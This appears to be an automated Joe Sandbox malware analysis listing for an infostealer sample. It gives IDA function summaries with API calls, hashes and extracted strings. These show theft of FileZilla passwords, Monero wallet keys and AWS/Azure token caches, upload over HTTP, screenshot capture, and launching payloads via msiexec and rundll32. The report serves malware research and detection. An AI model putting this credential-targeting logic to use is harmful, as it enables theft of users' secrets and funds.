                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: cf2528a62514ea9cfb05d28cd67edf25f034c17354d4114adb766571303891aa
                    • Instruction ID: 8fac8550101774dff538a4411141e9f2357c38a96b6e6525b53e4d95bf4bdb54
                    • Opcode Fuzzy Hash: cf2528a62514ea9cfb05d28cd67edf25f034c17354d4114adb766571303891aa
                    • Instruction Fuzzy Hash: 1DD12EB6900208ABCB06EBE4DD96FEE7738EF14304F50451DF506EA191DE74AE09DB62
                    Function 003B5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B59F8
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B5A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B5B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0118FA88,00000000,?,0118E898,00000000,?,003D1A1C), ref: 003B5E71
                    • lstrlen.KERNEL32(00000000), ref: 003B5E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003B5E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B5E9A
                    • lstrlen.KERNEL32(00000000), ref: 003B5EAF
                    • lstrlen.KERNEL32(00000000), ref: 003B5ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B5EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 003B5F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B5F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003B5F4C
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FB0
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FBD
                    • HttpOpenRequestA.WININET(00000000,0118FAA8,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B5BF8
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • InternetCloseHandle.WININET(00000000), ref: 003B5FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    • Opcode ID: ae804a12fe4a9d33e45025e827308e118f1cdef236ddc10945fcff8c00b08450
                    • Instruction ID: b9b840242d27a8811bdc849996c7283cc70497686afdab27601590fda7a45899
                    • Opcode Fuzzy Hash: ae804a12fe4a9d33e45025e827308e118f1cdef236ddc10945fcff8c00b08450
                    • Instruction Fuzzy Hash: DD12ED7182061CABDB16EBA0DC96FEEB778BF14704F50419DB10AA6091DF702E49CF66
                    Function 003BCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BCF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003BD0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003BD0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD208
                    • lstrcat.KERNEL32(?,003D1478), ref: 003BD217
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD22A
                    • lstrcat.KERNEL32(?,003D147C), ref: 003BD239
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD24C
                    • lstrcat.KERNEL32(?,003D1480), ref: 003BD25B
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD26E
                    • lstrcat.KERNEL32(?,003D1484), ref: 003BD27D
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD290
                    • lstrcat.KERNEL32(?,003D1488), ref: 003BD29F
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD2B2
                    • lstrcat.KERNEL32(?,003D148C), ref: 003BD2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 003BD2D4
                    • lstrcat.KERNEL32(?,003D1490), ref: 003BD2E3
                      • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                      • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                    • lstrlen.KERNEL32(?), ref: 003BD32A
                    • lstrlen.KERNEL32(?), ref: 003BD339
                      • Part of subcall function 003CAA70: StrCmpCA.SHLWAPI(01188B20,003BA7A7,?,003BA7A7,01188B20), ref: 003CAA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 003BD3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: d5c8df80e75dddc98cd840ff4f247a992997a05435d856bba84949205e9d465c
                    • Instruction ID: 12287674a74fabeaf29e99c93fb27f0f7b0bad71abaed2b44eaa5d37647e6eb4
                    • Opcode Fuzzy Hash: d5c8df80e75dddc98cd840ff4f247a992997a05435d856bba84949205e9d465c
                    • Instruction Fuzzy Hash: 35E12FB1910608ABCB06EBA0DD96FEE7778BF24305F104159F106FA191DE35AE09DB63
                    Function 003BC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0118DEB8,00000000,?,003D144C,00000000,?,?), ref: 003BCA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003BCA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003BCA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003BCAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003BCAD9
                    • StrStrA.SHLWAPI(?,0118DE40,003D0B52), ref: 003BCAF7
                    • StrStrA.SHLWAPI(00000000,0118DE88), ref: 003BCB1E
                    • StrStrA.SHLWAPI(?,0118E5B0,00000000,?,003D1458,00000000,?,00000000,00000000,?,01188B60,00000000,?,003D1454,00000000,?), ref: 003BCCA2
                    • StrStrA.SHLWAPI(00000000,0118E430), ref: 003BCCB9
                      • Part of subcall function 003BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                      • Part of subcall function 003BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                    • StrStrA.SHLWAPI(?,0118E430,00000000,?,003D145C,00000000,?,00000000,01188B70), ref: 003BCD5A
                    • StrStrA.SHLWAPI(00000000,01188AA0), ref: 003BCD71
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                      • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                    • lstrlen.KERNEL32(00000000), ref: 003BCE44
                    • CloseHandle.KERNEL32(00000000), ref: 003BCE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 57ba876fbef4fbc376256104a75089e88692214ae59e677b5326ee1950902d99
                    • Instruction ID: 1340fad94e81abec13fd61a1aa7553021c8a86afb92e6d981a46a7bcf1ad6fea
                    • Opcode Fuzzy Hash: 57ba876fbef4fbc376256104a75089e88692214ae59e677b5326ee1950902d99
                    • Instruction Fuzzy Hash: 99E110B181060CABDB16EBA0DC96FEEB778AF14304F40415DF106EA191DF346E4ACB66
                    Function 003C8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • RegOpenKeyExA.ADVAPI32(00000000,0118BB18,00000000,00020019,00000000,003D05B6), ref: 003C83A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                    • wsprintfA.USER32 ref: 003C8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                    • Instruction ID: 13028e42dfaad457788aa40996ee3d8b5e3610394db36a386b73d5a9f1e0bbff
                    • Opcode Fuzzy Hash: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                    • Instruction Fuzzy Hash: 66810BB191021CABDB25DB50CC95FEAB7B8FB18704F008299E109E6140DF756F89CF95
                    Function 003C4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 003C4DCD
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                      • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 003C4E59
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                      • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                      • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003C4EE5
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49B0
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D08D2), ref: 003C49C5
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49E2
                      • Part of subcall function 003C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003C4A1E
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,0118F9C8), ref: 003C4A4A
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FF8), ref: 003C4A5C
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A70
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FFC), ref: 003C4A82
                      • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A96
                      • Part of subcall function 003C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003C4AAC
                      • Part of subcall function 003C4910: DeleteFileA.KERNEL32(?), ref: 003C4B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 4cbcbda3f44fe0f18f789847b59e399b4d9f5268862a30afc844557061362cfc
                    • Instruction ID: 07ae54efab72d5bcab4c4406b240ff92634864f7e17a3c441e229930cece41e4
                    • Opcode Fuzzy Hash: 4cbcbda3f44fe0f18f789847b59e399b4d9f5268862a30afc844557061362cfc
                    • Instruction Fuzzy Hash: DC4195BA94020867C715F760EC57FED7338AB24704F404899B249EA1C2EEB55BC8DB92
                    Function 003C9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003C906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                    • Instruction ID: f48e6ab5dd39bdca4e24dc9d973642f6760fd6ad842b3a1210d679fe63cbe52d
                    • Opcode Fuzzy Hash: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                    • Instruction Fuzzy Hash: 8A71EFB1910208ABDB14EFE4DC89FEDB7B8BB58700F108509F515EB294DB78A905DB62
                    Function 003C2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C31C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C34EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                    • Instruction ID: a7bdadb506d92cc980b89c9d6822fa0941d7b98f906d19175dd8642c7ef55efe
                    • Opcode Fuzzy Hash: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                    • Instruction Fuzzy Hash: 5F12DC7181060C9BDB1AEBA0DC92FEEB778AF14304F50415DE506AA191EF742F4ACF66
                    Function 003C52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
